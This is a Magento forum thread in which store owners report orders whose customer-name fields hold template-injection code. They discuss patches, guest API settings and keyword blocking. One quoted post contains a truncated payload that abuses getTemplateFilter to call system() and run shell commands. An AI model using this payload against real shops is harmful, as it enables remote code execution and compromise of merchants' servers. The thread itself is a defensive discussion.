cancel
Showing results for 
Search instead for 
Did you mean: 

Code in place of customer name - Is this an attack?

Re: Code in place of customer name - Is this an attack?

So even upgrading to Magento 2.4.4 hasn't solved this issue.

Anyone Forum Moderator, please jump it.

Anyone else experienced this?

Shouldn't there me form validation as standard?

 

Thanks

Andy

Re: Code in place of customer name - Is this an attack?

If you are seeing orders being created, perhaps check to see if you are allowing guest access to the API:

 

Screenshot 2022-11-18 at 11-27-15 Configuration _ Settings _ Stores _ Magento Admin.png

 

 

Re: Code in place of customer name - Is this an attack?

1) You can add 'getTemplateFilter' to the list of banned keywords. You can also add citytoohot.fr

 

Re: Code in place of customer name - Is this an attack?

Hi,

We are having the same issue on 2.4.4-p2. We are fully up to date and patched.

 

I believe this is a exploit linked to the email template vulnerability in previous releases yet we have received an order with getTemplate code as the name despite characters being limited to alphanumeric only and guest API is disabled.

 

@ianleaphotfa91 how do you add banned keywords described?

 

Thank you.

Re: Code in place of customer name - Is this an attack?

Same issue on 2.4.5-p1.

 

Guest WEB API access is disabled.

Guest checkout is disabled.

 

How do they create orders?

Re: Code in place of customer name - Is this an attack?

There doesn't seem to be much from Magento regarding this issue.

 

If you're patched & up to date then this exploit will be unsuccessful. It attempts to inject using the email template vulnerability identified by Magento in February 2022.

Related Patches: MDVA-43395 & MDVA-43443. See Patch release notes.

 

There is a Github issue open regarding access via the API when the Guest API & Guest Orders are disabled. Seems that Magento are working on this.

Re: Code in place of customer name - Is this an attack?

Did you get an answer to your banned keyword query? I don't know how to do it either Smiley Happy

Many thanks

Re: Code in place of customer name - Is this an attack?


@Andy_Acute wrote:

Hi all

I recently made website about business analysis consulting and had an order come through where code had been inserted into the customer first name and second dame.

This code was:

{{var this.getTemplateFilter().filter(foobar)}}{{var this.getTemplateFilter().addAfterFilterCallback(system).filter(cd${IFS%??}/

 

Is this an attempted attack?

What validation does Magento 2.4.3 CE provide to block code injection?

Thank you

Andy


Did you scan you website? Go through from adobe official website and you will know is it virus or not.